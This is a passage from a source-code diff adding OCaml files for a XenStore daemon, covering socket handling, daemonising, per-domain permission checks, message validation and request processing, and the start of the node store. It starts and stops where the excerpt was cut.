options.separate_domain then Utils.barf_perror "Incompatible options"; + if options.fork then Os.daemonise (); + if options.pid_file <> Constants.null_string then Os.write_pid_file options.pid_file; + if options.output_pid then (Printf.printf "%d\n" (Os.get_pid ()); flush stdout) diff -r 10a8fae412c5 tools/xenstore/os.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/os.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,224 @@ +(* + OS-specific code for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version.
+ + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +let xenstored_proc_domid = "/proc/xen/xsd_domid" +let xenstored_proc_dom0_port = "/proc/xen/xsd_dom0_port" +let xenstored_proc_dom0_mfn = "/proc/xen/xsd_dom0_mfn" +let xenstored_proc_kva = "/proc/xen/xsd_kva" +let xenstored_proc_port = "/proc/xen/xsd_port" + +(* Change the permissions for a socket address *) +let xsd_chmod addr = + match addr with + | Unix.ADDR_UNIX name -> Unix.chmod name 0o600 + | _ -> Utils.barf_perror "addr -- chmod oops" + +(* Get a XenStore daemon directory *) +let xsd_getdir env_var fallback = + try Sys.getenv env_var with Not_found -> fallback + +(* Create the given XenStore daemon directory, if needed *) +let xsd_mkdir name = + if not (Sys.file_exists name) then Unix.mkdir name 0o755 + +(* Return the XenStore daemon run directory *) +let xsd_rundir () = + xsd_getdir "XENSTORED_RUNDIR" "/var/run/xenstored" + +(* Return the XenStore daemon path *) +let xsd_socket_path () = + xsd_getdir "XENSTORED_PATH" ((xsd_rundir ()) ^ "/socket") + +(* Return the name of the XenStore daemon read-only socket *) +let xsd_socket_ro () = + (xsd_socket_path ()) ^ "_ro" + +(* Return the name of the XenStore daemon read-write socket *) +let xsd_socket_rw () = + xsd_socket_path () + +(* Remove the old sockets *) +let xsd_unlink addr = + match addr with + | Unix.ADDR_UNIX name -> if Sys.file_exists name then Unix.unlink name + | _ -> Utils.barf_perror "addr -- unlink oops" + +let conn_fds = Hashtbl.create 8 +let conn_id = ref (- 1) +let in_set = ref [] +let out_set = ref [] + +(* Accept a connection *) +let accept 
socket can_write in_set out_set = + let (fd, _) = Unix.accept socket in + let interface = new Socket.socket_interface fd can_write in_set out_set in + let connection = new Connection.connection interface in + let domu = new Domain.domain !conn_id connection in + decr conn_id; + Hashtbl.add conn_fds domu#id fd; + domu + +(* Create and listen to a socket *) +let create_socket socket_name = + xsd_mkdir (xsd_rundir ()); + let addr = Unix.ADDR_UNIX socket_name + and socket = Unix.socket Unix.PF_UNIX Unix.SOCK_STREAM 0 in + xsd_unlink addr; + Unix.bind socket addr; + xsd_chmod addr; + Unix.listen socket 1; + socket + +let filter_conn_fds conn_fds domains = + let active_conn_ids = List.fold_left (fun ids domain -> if domain#id < 0 then domain#id :: ids else ids) [] domains in + Hashtbl.iter (fun id fd -> if not (List.mem id active_conn_ids) then Hashtbl.remove conn_fds id) conn_fds + +(* Fork daemon *) +let fork_daemon () = + let pid = Unix.fork () in + if pid < 0 then Utils.barf_perror ("Failed to fork daemon: " ^ (string_of_int pid)); + if pid <> 0 then exit 0 + +(* Return the (input) socket connections *) +let get_input_socket_connections conn_fds = + Hashtbl.fold (fun _ fd rest -> fd :: rest) conn_fds [] + +(* Return the (output) socket connections *) +let get_output_socket_connections domains conn_fds = + List.fold_left (fun rest domain -> if domain#can_write then Hashtbl.find conn_fds domain#id :: rest else rest) [] (List.filter (fun domain -> Hashtbl.mem conn_fds domain#id) domains) + +(* Read a value from a proc file *) +let read_int_from_proc name = + let fd = Unix.openfile name [ Unix.O_RDONLY ] 0o600 + and buff = String.create 20 in + let int = Unix.read fd buff 0 (String.length buff) in + Unix.close fd; + if int <> Constants.null_file_descr then int_of_string (String.sub buff 0 int) else Constants.null_file_descr + +let socket_rw = create_socket (xsd_socket_rw ()) +let socket_ro = create_socket (xsd_socket_ro ()) +let special_fds = ref [ socket_rw; socket_ro ] 
+ +(* Check connections *) +let check_connections xenstored event_chan = + filter_conn_fds conn_fds xenstored#domains#domains; + + let input_conns = get_input_socket_connections conn_fds + and output_conns = get_output_socket_connections xenstored#domains#domains conn_fds + and timeout = xenstored#domains#timeout in + + let (i_set, o_set, _) = Unix.select ((if event_chan <> Constants.null_file_descr then Socket.file_descr_of_int event_chan :: !special_fds else !special_fds) @ input_conns) output_conns [] timeout in + in_set := i_set; + out_set := o_set; + + if List.mem socket_rw !in_set then xenstored#add_domain (accept socket_rw true in_set out_set); + if List.mem socket_ro !in_set then xenstored#add_domain (accept socket_ro false in_set out_set) + +(* Check the event channel for an event *) +let check_event_chan event_chan = + List.mem (Socket.file_descr_of_int event_chan) !in_set + +(* Daemonise *) +let daemonise () = + (* Separate from parent via fork, so init inherits us *) + fork_daemon (); + + (* Session leader so ^C doesn't whack us *) + ignore (Unix.setsid ()); + + (* Let session leader exit so child cannot regain CTTY *) + fork_daemon (); + + (* Move off any mount points we might be in *) + (try Unix.chdir "/" with _ -> Utils.barf_perror "Failed to chdir"); + + (* Discard parent's old-fashioned umask prejudices *) + ignore (Unix.umask 0); + + (* Redirect outputs to null device *) + let dev_null = Unix.openfile "/dev/null" [ Unix.O_RDWR ] 0o600 in + Unix.dup2 dev_null Unix.stdin; + Unix.dup2 dev_null Unix.stdout; + Unix.dup2 dev_null Unix.stderr; + Unix.close dev_null + +(* Return the XenStore domain ID *) +let get_domxs_id () = + read_int_from_proc xenstored_proc_domid + +(* Return the Domain-0 mfn *) +let get_dom0_mfn () = + read_int_from_proc xenstored_proc_dom0_mfn + +(* Return the Domain-0 port *) +let get_dom0_port () = + read_int_from_proc xenstored_proc_dom0_port + +(* Return the pid *) +let get_pid () = + Unix.getpid () + +(* Return the current 
time *) +let get_time () = + let tm = Unix.localtime (Unix.gettimeofday ()) in + let year = tm.Unix.tm_year + 1900 + and month = tm.Unix.tm_mon + 1 + and day = tm.Unix.tm_mday + and hour = tm.Unix.tm_hour + and minute = tm.Unix.tm_min + and second = tm.Unix.tm_sec in + Printf.sprintf "%04d%02d%02d %02d:%02d:%02d" year month day hour minute second;; + +(* Return the XenBus port *) +let get_xenbus_port () = + let fd = Unix.openfile xenstored_proc_port [ Unix.O_RDONLY ] 0 + and str = String.create 20 in + let len = Unix.read fd str 0 (String.length str) in + Unix.close fd; + if len <> - 1 then int_of_string (String.sub str 0 len) else Constants.null_file_descr + +(* OS specific initialisation *) +let init () = + ignore (Sys.signal Sys.sigpipe Sys.Signal_ignore) + +(* Map XenBus page *) +let map_xenbus port = + let fd = Unix.openfile xenstored_proc_kva [ Unix.O_RDWR ] 0o600 in + let interface = new Xenbus.xenbus_interface port (Xenbus.mmap (Socket.int_of_file_descr fd)) in + Unix.close fd; + interface + +(* Extra option parsing, if needed *) +let parse_option option = + () + +(* Write PID file *) +let write_pid_file pid_file = + let fd = Unix.openfile pid_file [ Unix.O_RDWR; Unix.O_CREAT ] 0o600 in + + (* Exit silently if daemon already running *) + (try Unix.lockf fd Unix.F_TLOCK 0 with _ -> ignore (exit 0)); + + let pid = string_of_int (Unix.getpid ()) in + let len = String.length pid in + + try + if Unix.write fd pid 0 len <> len then Utils.barf_perror ("Writing pid file " ^ pid_file); + Unix.close fd + with _ -> Utils.barf_perror ("Writing pid file " ^ pid_file) diff -r 10a8fae412c5 tools/xenstore/permission.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/permission.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,111 @@ +(* + Permissions for OCaml XenStore Daemon. 
+ Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +type access = + | NONE + | READ + | WRITE + | BOTH + +type t = + { + access : access; + domain_id : int + } + +let make access domain_id = + { + access = access; + domain_id = domain_id + } + +let permission_of_string string = + { + access = + (match string.[0] with + | 'n' -> NONE + | 'r' -> READ + | 'w' -> WRITE + | 'b' -> BOTH + | _ -> raise (Constants.Xs_error (Constants.EINVAL, "permission_of_string", string))); + domain_id = int_of_string (String.sub string 1 (pred (String.length string))) + } + +let string_of_permission permission = + let perm_str = + match permission.access with + | NONE -> "n" + | READ -> "r" + | WRITE -> "w" + | BOTH -> "b" in + perm_str ^ (string_of_int permission.domain_id) + +let check_access access1 access2 = + match access1 with + | READ | WRITE -> access2 = access1 || access2 = BOTH + | _ -> access2 = access1 + +let compare permission1 permission2 = + permission1.access = permission2.access && permission1.domain_id = permission2.domain_id + +let get_path path = + Store.root_path ^ ".permissions" ^ (if path = Store.root_path then Constants.null_string else path) + +class permissions = +object(self) + method add (store : string Store.store) (path : string) (domain_id : int) = + 
let domain_id = if domain_id < 0 then 0 else domain_id + and parent_path = Store.parent_path path in + if not (store#node_exists (get_path parent_path)) then self#add store parent_path domain_id; + let parent_permissions = self#get store parent_path in + let new_permissions = if domain_id = 0 then parent_permissions else make (List.hd parent_permissions).access domain_id :: List.tl parent_permissions in + self#set (List.map string_of_permission new_permissions) store path + method check (store : string Store.store) path access domain_id = + let domain_id = if domain_id < 0 then 0 else domain_id + and permissions = self#get store path in + if domain_id = 0 + then true + else + let default_permission = List.hd permissions + and actual_permissions = List.tl permissions in + if default_permission.domain_id = domain_id + then true + else check_access access (try (List.find (fun perm -> perm.domain_id = domain_id) actual_permissions).access with Not_found -> default_permission.access) + method get (store : string Store.store) (path : string) = + let ppath = get_path path in + match store#read_node ppath with + | Store.Value permissions | Store.Hack (permissions, _) -> List.map permission_of_string (Utils.split permissions) + | Store.Empty -> raise (Constants.Xs_error (Constants.EINVAL, "Permission.permissions#get", ppath)) + | Store.Children _ -> + let parent_path = Store.parent_path path in + let parent_permissions = self#get store parent_path in + self#set (List.map string_of_permission parent_permissions) store path; + parent_permissions + method remove (store : string Store.store) path = store#remove_node (get_path path) + method set (permissions : string list) (store : string Store.store) (path : string) = + let ppath = get_path path in + let parent_path = Store.parent_path path in + if not (path = Store.root_path) && not (store#node_exists (get_path parent_path)) + then ( + let domain_id = (permission_of_string (List.hd permissions)).domain_id in + self#add store 
parent_path domain_id + ); + ignore (try store#read_node ppath with _ -> store#create_node ppath; store#read_node ppath); + store#write_node ppath (Utils.combine_with_string permissions (String.make 1 Constants.null_char)); +end diff -r 10a8fae412c5 tools/xenstore/process.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/process.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,412 @@ +(* + Processing for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. 
+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* Check for a valid domain ID *) +let check_domain_id domain_id = + try int_of_string domain_id >= 0 with _ -> false + +(* Check for a valid domain ID (only parameter) *) +let check_domain_id_only payload = + let domain_id = List.hd (Utils.split payload) in + String.length domain_id = pred (String.length payload) && check_domain_id domain_id + +(* Check for 32-bit integer *) +let check_int int = + try ignore (Int32.of_string int); true with _ -> false + +(* Check introduce *) +let check_introduce payload = + let split = Utils.split payload in + let length = List.length split in + (length = 3 || length = 4) && check_domain_id (List.nth split 0) && check_int (List.nth split 1) && check_int (List.nth split 2) + +let rec check_chars path i = + if i >= String.length path + then true + else if not (String.contains Store.valid_characters path.[i]) + then false + else check_chars path (succ i) + +(* Check for a valid path *) +let check_path path = + if String.length path > 0 + then + if path.[pred (String.length path)] <> Store.dividor + then + if not (Utils.strstr path "//") + then + if Store.is_relative path + then + if String.length path <= Constants.relative_path_max + then check_chars path 0 + else false + else if String.sub path 0 (String.length Store.root_path) = Store.root_path + then + if String.length path <= Constants.absolute_path_max + then check_chars path 0 + else false + else false + else false + else if path = Store.root_path then true else false + else false + +(* Check for a valid path (only parameter) *) +let check_path_only payload = + let path = Utils.strip_null payload in + succ (String.length path) = String.length payload && check_path path + +let check_permissions payload = + let split = Utils.split payload in + let min_length = if 
payload.[pred (String.length payload)] = Constants.null_char then 2 else 3 + and perm_list = if payload.[pred (String.length payload)] = Constants.null_char then List.tl split else Utils.remove_last (List.tl split) in + List.length split >= min_length && check_path (List.nth split 0) && List.fold_left (fun accum perm -> accum && (try ignore (Permission.permission_of_string perm); true with _ -> false)) true perm_list + +(* Check for a valid transaction end *) +let check_transaction_end payload = + let value = Utils.strip_null payload in + succ (String.length value) = String.length payload && (value = Constants.payload_true || value = Constants.payload_false) + +(* Check for a valid transaction start *) +let check_transaction_start payload = + String.length payload = 1 && payload.[0] = Constants.null_char + +(* Check for a valid watch path *) +let check_watch_path path = + if Store.is_event path then check_chars path 0 else check_path path + +(* TODO: Check for a valid watch token *) +let check_watch_token token = + true + +(* Check for a valid watch/unwatch *) +let check_watch payload = + let split = Utils.split payload in + let length = List.length split in + (length = 2 || length = 3) && check_watch_path (List.nth split 0) && check_watch_token (List.nth split 1) + +let check_write payload = + let split = Utils.split payload in + let length = List.length split in + (length = 1 || length = 2) && check_path (List.nth split 0) + +(* Check a message to make sure the payload is valid *) +let check message = + match message.Message.header.Message.message_type with + | Message.XS_DIRECTORY -> check_path_only message.Message.payload + | Message.XS_GET_DOMAIN_PATH -> check_path_only message.Message.payload + | Message.XS_GET_PERMS -> check_path_only message.Message.payload + | Message.XS_INTRODUCE -> check_introduce message.Message.payload + | Message.XS_IS_DOMAIN_INTRODUCED -> check_path_only message.Message.payload + | Message.XS_MKDIR -> check_path_only 
message.Message.payload + | Message.XS_READ -> check_path_only message.Message.payload + | Message.XS_RELEASE -> check_path_only message.Message.payload + | Message.XS_RESUME -> check_path_only message.Message.payload + | Message.XS_RM -> check_path_only message.Message.payload + | Message.XS_SET_PERMS -> check_permissions message.Message.payload + | Message.XS_TRANSACTION_END -> check_transaction_end message.Message.payload + | Message.XS_TRANSACTION_START -> check_transaction_start message.Message.payload + | Message.XS_UNWATCH -> check_watch message.Message.payload + | Message.XS_WATCH -> check_watch message.Message.payload + | Message.XS_WRITE -> check_write message.Message.payload + | _ -> false + +(* Return the list of parent paths that will be created for a given path *) +let rec created_paths store path = + if store#node_exists path then [] else path :: created_paths store (Store.parent_path path) + +(* Return the list of child paths that will be deleted for a given path *) +let rec removed_paths store path = + match store#read_node path with + | Store.Children children | Store.Hack (_, children) -> List.fold_left (fun paths child -> paths @ (removed_paths store child#path)) [] children + | _ -> [ path ] + +(* Process a directory message *) +let process_directory domain store xenstored message = + let path = Store.canonicalise domain (Utils.strip_null message.Message.payload) in + try + if xenstored#permissions#check store path Permission.READ domain#id + then + let payload = + match store#read_node path with + | Store.Children (children) | Store.Hack (_, children) -> List.fold_left (fun children_string child -> if check_path child#path then children_string ^ (Utils.null_terminate (Store.base_path child#path)) else children_string) Constants.null_string children + | _ -> Constants.null_string in + domain#add_output_message (Message.reply message payload) + else domain#add_output_message (Message.error message Constants.EACCES) + with Constants.Xs_error 
(errno, _, _) -> domain#add_output_message (Message.error message errno) + +(* Process a get domain path message *) +let process_get_domain_path domain store message = + let domid = Utils.strip_null message.Message.payload in + let path = Utils.null_terminate (Store.domain_root ^ domid) in + domain#add_output_message (Message.reply message path) + +(* Process a get permissions message *) +let process_get_perms domain store xenstored message = + let path = Store.canonicalise domain (Utils.strip_null message.Message.payload) in + if xenstored#permissions#check store path Permission.READ domain#id + then + let permissions = xenstored#permissions#get store path in + let payload = List.fold_left (fun permissions_string permission -> permissions_string ^ (Utils.null_terminate (Permission.string_of_permission permission))) Constants.null_string permissions in + domain#add_output_message (Message.reply message payload) + else domain#add_output_message (Message.error message Constants.EACCES) + +(* Process an introduce message *) +let process_introduce domain store xenstored message = + let split = Utils.split message.Message.payload in + let domid = List.nth split 0 + and mfn = List.nth split 1 + and port = List.nth split 2 + and reserved = if List.length split = 4 then List.nth split 3 else Constants.null_string in + if not (Domain.is_unprivileged domain) + then ( + (* XXX: Reserved value *) + if String.length reserved > 0 then (); + let domu = Domain.domu_init (int_of_string domid) (int_of_string port) (int_of_string mfn) false in + xenstored#add_domain domu; + xenstored#watches#fire_watches "@introduceDomain" (message.Message.header.Message.transaction_id <> 0l) false; + domain#add_output_message (Message.ack message) + ) + else domain#add_output_message (Message.error message Constants.EACCES) + +(* Process an is-domain-introduced message *) +let process_is_domain_introduced domain store xenstored message = + let domid = int_of_string (Utils.strip_null
message.Message.payload) in + let domain_exists = try xenstored#domains#find_by_id domid; true with Not_found -> false in + let payload = Utils.null_terminate (if domid = Constants.domain_id_self || domain_exists then Constants.payload_true else Constants.payload_false) in + domain#add_output_message (Message.reply message payload) + +(* Process a mkdir message *) +let process_mkdir domain store xenstored message = + let path = Store.canonicalise domain (Utils.strip_null message.Message.payload) + and transaction = Transaction.make domain#id message.Message.header.Message.transaction_id in + (* If permissions exist, node already exists *) + try + if xenstored#permissions#check store path Permission.WRITE domain#id + then domain#add_output_message (Message.ack message) + else domain#add_output_message (Message.error message Constants.EACCES) + with _ -> + try + if not (store#node_exists path) + then ( + let paths = created_paths store path in + store#create_node path; + xenstored#permissions#add store path domain#id; + List.iter (fun path -> xenstored#domain_entry_incr store transaction path) paths; + if message.Message.header.Message.transaction_id = 0l + then ( + xenstored#transactions#invalidate path; + xenstored#watches#fire_watches path false false + ) + ); + domain#add_output_message (Message.ack message) + with e -> raise e (*domain#add_output_message (Message.error message Constants.EINVAL)*) + +(* Process a read message *) +let process_read domain store xenstored message = + let path = Store.canonicalise domain (Utils.strip_null message.Message.payload) in + try + if xenstored#permissions#check store path Permission.READ domain#id + then + let payload = + match store#read_node path with + | Store.Value value | Store.Hack (value, _) -> value + | _ -> Constants.null_string in + domain#add_output_message (Message.reply message payload) + else domain#add_output_message (Message.error message Constants.EACCES) + with Constants.Xs_error (errno, _, _) -> 
domain#add_output_message (Message.error message errno) + +(* Process a release message *) +let process_release domain store xenstored message = + if domain#id <= 0 + then + let domu_id = int_of_string (Utils.strip_null message.Message.payload) in + try + xenstored#remove_domain (xenstored#domains#find_by_id domu_id); + if domu_id > 0 then xenstored#watches#fire_watches "@releaseDomain" false false; + domain#add_output_message (Message.ack message) + with Not_found -> domain#add_output_message (Message.error message Constants.ENOENT) + else domain#add_output_message (Message.error message Constants.EACCES) + +(* Process a rm message *) +let process_rm domain store xenstored message = + let path = Store.canonicalise domain (Utils.strip_null message.Message.payload) + and transaction = Transaction.make domain#id message.Message.header.Message.transaction_id in + try + if store#node_exists path + then + if xenstored#permissions#check store path Permission.WRITE domain#id + then + if path <> Store.root_path + then ( + let paths = removed_paths store path in + List.iter (fun path -> xenstored#domain_entry_decr store transaction path) paths; + store#remove_node path; + xenstored#permissions#remove store path; + if message.Message.header.Message.transaction_id = 0l + then ( + xenstored#transactions#invalidate path; + xenstored#watches#fire_watches path false true + ); + domain#add_output_message (Message.ack message) + ) + else domain#add_output_message (Message.error message Constants.EINVAL) + else domain#add_output_message (Message.error message Constants.EACCES) + else if store#node_exists (Store.parent_path path) + then + if xenstored#permissions#check store (Store.parent_path path) Permission.WRITE domain#id + then domain#add_output_message (Message.ack message) + else domain#add_output_message (Message.error message Constants.EACCES) + else domain#add_output_message (Message.error message Constants.ENOENT) (* XXX: This might be wrong *) + with Constants.Xs_error 
(errno, _, _) -> domain#add_output_message (Message.error message errno) + +(* Process a set permissions message *) +let process_set_perms domain store xenstored message = + let split = Utils.split message.Message.payload in + let path = Store.canonicalise domain (List.hd split) in + let (permissions, reserved) = + if message.Message.payload.[pred (String.length message.Message.payload)] = Constants.null_char + then (List.tl split, Constants.null_string) + else (Utils.remove_last (List.tl split), List.nth split (pred (List.length split))) in + if xenstored#permissions#check store path Permission.WRITE domain#id + then ( + (* XXX: Reserved value *) + if String.length reserved > 0 then (); + try + xenstored#permissions#set permissions store path; + xenstored#watches#fire_watches path (message.Message.header.Message.transaction_id <> 0l) false; + domain#add_output_message (Message.ack message) + with _ -> domain#add_output_message (Message.error message Constants.EACCES) (* XXX: errno? *) + ) + else domain#add_output_message (Message.error message Constants.EACCES) + +(* Process a transaction end message *) +let process_transaction_end domain store xenstored message = + let transaction = Transaction.make domain#id message.Message.header.Message.transaction_id in + if xenstored#transactions#exists transaction + then ( + Trace.destroy domain#id "transaction"; + if Utils.strip_null message.Message.payload = Constants.payload_true + then + if xenstored#commit transaction + then domain#add_output_message (Message.ack message) + else domain#add_output_message (Message.error message Constants.EAGAIN) + else domain#add_output_message (Message.ack message) + ) + else domain#add_output_message (Message.error message Constants.ENOENT) + +(* Process a transaction start message *) +let process_transaction_start domain store xenstored message = + try + if message.Message.header.Message.transaction_id = 0l + then + let transaction = xenstored#new_transaction domain store in + let 
payload = Utils.null_terminate (Int32.to_string transaction.Transaction.transaction_id) in + domain#add_output_message (Message.reply message payload) + else domain#add_output_message (Message.error message Constants.EBUSY) + with Constants.Xs_error (errno, _, _) -> domain#add_output_message (Message.error message errno) + +(* Process an unwatch message *) +let process_unwatch domain store xenstored message = + let split = Utils.split message.Message.payload in + let path = List.nth split 0 + and token = List.nth split 1 + and reserved = if List.length split = 3 then List.nth split 2 else Constants.null_string in + let relative = Store.is_relative path in + let actual_path = if relative then Store.canonicalise domain path else path in + (* XXX: Reserved value *) + if String.length reserved > 0 then (); + if xenstored#watches#remove (Watch.make domain actual_path token relative) + then ( + Trace.destroy domain#id "watch"; + domain#add_output_message (Message.ack message) + ) + else domain#add_output_message (Message.error message Constants.ENOENT) + +(* Process a watch message *) +let process_watch domain store xenstored message = + let split = Utils.split message.Message.payload in + let path = List.nth split 0 + and token = List.nth split 1 + and reserved = if List.length split = 3 then List.nth split 2 else Constants.null_string in + let relative = Store.is_relative path in + let actual_path = if relative then Store.canonicalise domain path else path in + (* XXX: Reserved value *) + if String.length reserved > 0 then (); + if xenstored#add_watch domain (Watch.make domain actual_path token relative) + then ( + Trace.create domain#id "watch"; + domain#add_output_message (Message.ack message); + domain#add_output_message (Message.event ((Utils.null_terminate path) ^ (Utils.null_terminate token))) + ) + else domain#add_output_message (Message.error message Constants.EEXIST) + +(* Process a write message *) +let process_write domain store xenstored message = + let 
split = Utils.split message.Message.payload in + let path = Store.canonicalise domain (List.hd split) + and value = Utils.combine (List.tl split) in + let transaction = Transaction.make domain#id message.Message.header.Message.transaction_id in + if not (store#node_exists path) || xenstored#permissions#check store path Permission.WRITE domain#id + then + if Domain.is_unprivileged domain && String.length value >= xenstored#options.Option.quota_max_entry_size + then domain#add_output_message (Message.error message Constants.ENOSPC) + else + try + if not (store#node_exists path) + then ( + let paths = created_paths store path in + store#create_node path; + xenstored#permissions#add store path domain#id; + List.iter (fun path -> xenstored#domain_entry_incr store transaction path) paths + ); + store#write_node path value; + if message.Message.header.Message.transaction_id = 0l + then ( + xenstored#transactions#invalidate path; + xenstored#watches#fire_watches path false false + ); + domain#add_output_message (Message.ack message) + with e -> raise e (*domain#add_output_message (Message.error message Constants.EINVAL)*) (* XXX: Wrong error? 
*) + else domain#add_output_message (Message.error message Constants.EACCES) + +(* Process a message *) +let process (xenstored : Xenstored.xenstored) domain = + let message = domain#input_message in + let store = xenstored#transactions#store (Transaction.make domain#id message.Message.header.Message.transaction_id) in + if check message + then ( + match message.Message.header.Message.message_type with + | Message.XS_DIRECTORY -> process_directory domain store xenstored message + | Message.XS_GET_DOMAIN_PATH -> process_get_domain_path domain store message + | Message.XS_GET_PERMS -> process_get_perms domain store xenstored message + | Message.XS_INTRODUCE -> process_introduce domain store xenstored message + | Message.XS_IS_DOMAIN_INTRODUCED -> process_is_domain_introduced domain store xenstored message + | Message.XS_MKDIR -> process_mkdir domain store xenstored message + | Message.XS_READ -> process_read domain store xenstored message + | Message.XS_RELEASE -> process_release domain store xenstored message + | Message.XS_RM -> process_rm domain store xenstored message + | Message.XS_SET_PERMS -> process_set_perms domain store xenstored message + | Message.XS_TRANSACTION_END -> process_transaction_end domain store xenstored message + | Message.XS_TRANSACTION_START -> process_transaction_start domain store xenstored message + | Message.XS_UNWATCH -> process_unwatch domain store xenstored message + | Message.XS_WATCH -> process_watch domain store xenstored message + | Message.XS_WRITE -> process_write domain store xenstored message + | _ -> domain#add_output_message (Message.error message Constants.EINVAL) + ) + else domain#add_output_message (Message.error message Constants.EINVAL) diff -r 10a8fae412c5 tools/xenstore/socket.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/socket.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,46 @@ +(* + Socket for OCaml XenStore Daemon. 
+ Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* Convert an int to a file descriptor *) +external file_descr_of_int : int -> Unix.file_descr = "%identity" + +(* Convert a file descriptor to an int *) +let int_of_file_descr fd = (Obj.magic (fd: Unix.file_descr) : int) + +(* Socket interface *) +class socket_interface fd can_write in_set out_set = +object (self) + inherit Interface.interface as super + val m_fd = fd + val m_can_write = can_write + val m_in_set = in_set + val m_out_set = out_set + method private fd = m_fd + method private in_set = !m_in_set + method private out_set = !m_out_set + method can_read = List.mem self#fd self#in_set + method can_write = can_write + method destroy = Unix.close self#fd + method read buffer offset length = + let bytes_read = Unix.read self#fd buffer offset length in + if bytes_read = 0 && length <> 0 + then raise (Constants.Xs_error (Constants.EIO, "socket_interface#read", "could not read data")) + else bytes_read + method write buffer offset length = Unix.write self#fd buffer offset (min length (String.length buffer)) +end diff -r 10a8fae412c5 tools/xenstore/store.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/store.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,144 @@ +(* + Store for OCaml 
XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* XenStore node contents type *) +type ('node, 'contents) node_contents = + | Empty + | Value of 'contents + | Children of 'node list + | Hack of 'contents * 'node list + +let dividor = '/' +let dividor_str = String.make 1 dividor +let root_path = dividor_str +let domain_root = root_path ^ "local" ^ dividor_str ^ "domain" ^ dividor_str +let valid_characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-/_@" + +(* Return the base path of a path *) +let base_path path = + if path = root_path + then path + else + let start = succ (String.rindex path dividor) in + String.sub path start ((String.length path) - start) + +(* Compare two nodes *) +let compare node1 node2 = + String.compare node1#path node2#path + +(* Check if a path is a child of another path *) +let is_child child parent = + if parent = root_path + then true + else + let length = min (String.length parent) (String.length child) in + if String.sub child 0 length <> String.sub parent 0 length + then false + else + let parent_length = String.length parent + and child_length = String.length child in + (* XXX: This returns child = parent *) + if parent_length = child_length + then true + else if parent_length < 
child_length then String.get child parent_length = dividor + else false + +(* Check if a path is an event path *) +let is_event path = + path.[0] = Constants.event_char + +(* Check if a path is a relative path *) +let is_relative path = + not (is_event path) && String.sub path 0 (String.length root_path) <> root_path + +(* Iterate over nodes applying function f to each node *) +let rec iter f node = + match node#contents with + | Empty -> () + | Children children -> List.iter (fun child -> iter f child) children + | Value value -> f value + | Hack (value, children) -> f value; List.iter (fun child -> iter f child) children + +(* Return the parent path of a path *) +let parent_path path = + let slash = String.rindex path dividor in + if slash = 0 then root_path else String.sub path 0 slash + +(* Return canonicalised path *) +let canonicalise domain path = + if not (is_relative path) then path else domain_root ^ (string_of_int domain#id) ^ dividor_str ^ path + +(* XenStore node type *) +class ['contents] node path (contents : ('contents node, 'contents) node_contents) = +object (self) + val m_path = path + val mutable m_contents = contents + method add_child child = + match self#contents with + | Empty -> m_contents <- Children [ child ]; true + | Value value -> m_contents <- Hack (value, [ child ]); true (* false *) + | Children children -> m_contents <- Children (List.sort compare (child :: children)); true + | Hack (value, children) -> m_contents <- Hack (value, List.sort compare (child :: children)); true + method contents = m_contents + method path = m_path + method get_child child_path = + match self#contents with + | Children children 